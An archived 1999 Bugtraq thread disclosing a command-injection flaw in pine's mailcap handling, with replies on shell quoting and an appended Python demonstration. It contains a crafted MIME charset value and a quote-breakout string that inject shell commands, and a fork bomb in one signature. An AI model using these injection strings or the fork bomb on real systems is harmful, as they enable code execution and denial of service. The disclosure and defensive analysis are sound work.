Date: Mon, 8 Feb 1999 00:22:17 +0100
From: Michal Zalewski
To: BUGTRAQ@netspace.org
Subject: remote exploit on pine 4.10 - neverending story?

Affected systems:
-----------------

Any Un*x system running 'pine' up to version 4.10 (latest).

Compromise:
-----------

Remote execution of arbitrary code when message is viewed.

Details:
--------

About five months ago, I reported a vulnerability in the metamail package used with pine. I also noticed that the '`' character is incorrectly expanded by pine. The problem has been ignored (probably no one understood what I was talking about? ;-). But no matter. An excerpt from /etc/mailcap:

  text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput

Impact:
-------

And now, ladies and gentlemen - my old bug, reinvented. Usually, the above mailcap line is expanded to:

  [...]
  execve (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]' '[a-z]'`" = iso-8859-1)

Hmm, but take a look at this message:

************************** MIME MESSAGE FOLLOWS **************************

From: Attacker
To: Victim
Subject: Happy birthday ...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"

...it could be your last.

*************************** MIME MESSAGE ENDS ***************************

The result is:

  [...]
  execve (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr '[A-Z]' '[a-z]'`" = iso-8859-1)

...and arbitrary code ('touch ME', encoded using the ${IFS} trick) is executed when the message is viewed.

Fix:
----

Well, it's the second time I report problems with ` in headers.
Maybe pine developers should wait a little longer ;-)

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] [pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]

-------------------------------------------------------------------------

Date: Mon, 8 Feb 1999 18:13:53 +0100
From: Thomas Roessler
To: BUGTRAQ@netspace.org
Subject: Re: remote exploit on pine 4.10 - neverending story?

This bug exhibits a general mailcap design problem, actually some apparent lack of clarity in RFC 1524: The mailcap format specification does not define where quoting takes place. As a result, users tend to do quoting manually using constructs like "%..." or '%...'. Software tends not to do _any_ quoting of its own.

Why this means begging for disaster is obvious: Attackers can construct strings with appropriate shell metacharacters to trick users into executing arbitrary shell commands - just like Michal demonstrated for this special case.

The only proper solution is that users MUST NOT perform any quoting on their own in mailcap files, and that software MUST perform proper shell quoting when expanding the %{something} strings. "Proper shell quoting" means to put the complete string into single quotes and to replace any ' inside the string by the sequence of characters '\''. (Note that this is already in some Unix programming FAQ.)

"Simply" trying to escape or wipe out shell metacharacters will also be a recipe for problems. Think about certain bash versions' handling of (as far as I recall) \xff as a word separator.
tlr
--
Thomas Roessler · 74a353cc0b19 · dg1ktr · http://home.pages.de/~roessler/
2048/CE6AC6C1 · 4E 04 F0 BC 72 FF 14 23 44 85 D1 A1 3B B0 73 C1

-------------------------------------------------------------------------

Date: Mon, 8 Feb 1999 09:25:11 -0800
From: John D. Hardin
To: BUGTRAQ@netspace.org
Subject: Re: remote exploit on pine 4.10 - neverending story?

Okay, I have added `` -> " conversion to my procmail MIME sanitizer.

Michal, is that the only way to exploit this? Or should there be ` -> ' conversion as well?

See http://www.wolfenet.com/~jhardin/procmail-security.html for details.

--
John Hardin KA7OHZ                                    jhardin@wolfenet.com
pgpk -a finger://gonzo.wolfenet.com/jhardin         PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
Your mouse has moved. Windows NT must be restarted for the change to take effect. Reboot now? [ OK ]
-----------------------------------------------------------------------
101 days until Star Wars episode I
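The expansion Michal shows and the quoting rule Thomas Roessler gives, as an added example that is not part of the thread and not pine's or procmail's code. It models mailcap %{param} expansion in Python, reproduces the sh command line from the first post, applies the '\'' rule from the reply, and hands the flat variant to a real sh. Everything named here (NESTED_TEMPLATE, FLAT_TEMPLATE, BREAKOUT_CHARSET, bare_quote, posix_quote, expand, backquote_bodies, creates_file) is constructed for the example; only the mailcap entry and the charset value come from the post. Running it needs a POSIX sh and touch on PATH.

```python
"""Added example, not code from the thread or from pine: a model of mailcap
%{param} expansion that reproduces the sh command line shown in Michal
Zalewski's post, applies the '\\'' quoting rule from Thomas Roessler's
reply, and lets a real sh show the difference.  Templates, parameter
values and helper names are constructed for this example; only the
mailcap entry and the charset value come from the post."""
import os
import re
import subprocess
import tempfile

# The test= command of the mailcap entry from the post: the user's own
# quoting around the tr arguments, %{charset} nested inside backquotes.
NESTED_TEMPLATE = "test \"`echo %{charset} | tr '[A-Z]' '[a-z]'`\" = iso-8859-1"
# Constructed variant that uses the parameter directly, not inside `...`.
FLAT_TEMPLATE = "test %{charset} = iso-8859-1"

# charset= value from the attacker's message in the post; ${IFS} stands in
# for a space the parameter value could not carry.
POST_CHARSET = "``touch${IFS}ME``"
# Constructed value for the flat template: closes the added quotes itself.
BREAKOUT_CHARSET = "x';touch${IFS}ME;'"


def bare_quote(value):
    """Quoting as seen in the post's execve trace: plain single quotes."""
    return "'" + value + "'"


def posix_quote(value):
    """Roessler's rule: single-quote the whole string, ' becomes '\\''."""
    return "'" + value.replace("'", "'\\''") + "'"


def expand(template, params, quote=bare_quote):
    """Replace every %{name} in a mailcap command with the quoted value."""
    return re.sub(r"%\{(\w+)\}",
                  lambda m: quote(params.get(m.group(1), "")), template)


def backquote_bodies(cmd):
    """Return the bodies of old-style `...` substitutions as sh delimits
    them: a body ends at the next backquote not escaped by a backslash,
    and quotes INSIDE the body are not tracked (POSIX leaves that
    undefined; the shells the post targets just stop at the backquote).
    Top-level single quotes do protect a backquote, so they are honoured."""
    bodies, i, n, in_dq = [], 0, len(cmd), False
    while i < n:
        c = cmd[i]
        if c == "\\":
            i += 2
        elif c == '"':
            in_dq = not in_dq
            i += 1
        elif c == "'" and not in_dq:
            j = cmd.find("'", i + 1)
            i = n if j < 0 else j + 1
        elif c == "`":
            j = i + 1
            while j < n and cmd[j] != "`":
                j += 2 if cmd[j] == "\\" else 1
            bodies.append(cmd[i + 1:j])
            i = j + 1
        else:
            i += 1
    return bodies


def creates_file(cmd, name="ME"):
    """Run cmd with sh -c in a scratch directory; True if it created name."""
    with tempfile.TemporaryDirectory() as scratch:
        subprocess.run(["sh", "-c", cmd], cwd=scratch,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return os.path.exists(os.path.join(scratch, name))


if __name__ == "__main__":
    for charset in ("US-ASCII", POST_CHARSET):
        cmd = expand(NESTED_TEMPLATE, {"charset": charset})
        print(cmd)
        print("  substitution bodies:", backquote_bodies(cmd))
    # The '\'' rule changes nothing here: the value has no quote in it, and
    # a backquote inside the nested body still ends the substitution.
    print(backquote_bodies(expand(NESTED_TEMPLATE,
                                  {"charset": POST_CHARSET}, posix_quote)))
    # With a flat template the rule does its job against a quote breakout.
    for quote in (bare_quote, posix_quote):
        cmd = expand(FLAT_TEMPLATE, {"charset": BREAKOUT_CHARSET}, quote)
        print(quote.__name__, "->", cmd, "creates ME:", creates_file(cmd))
```

The delimiter scan in backquote_bodies is the point of the example: for the entry from the post, the doubled backquotes in the charset value split the template's single `...` into three bodies, the middle one being touch${IFS}ME, and that split is the same whether the value was wrapped in bare single quotes (as pine's trace shows) or with Roessler's '\'' rule, because the scan for the closing backquote does not look at quotes inside the body. Whether that middle body then runs depends on when the shell parses the broken first body; the trace in the post shows it did. For a template that uses the parameter directly, the '\'' rule holds: the breakout value creates ME under bare quoting and stays an inert string under posix_quote.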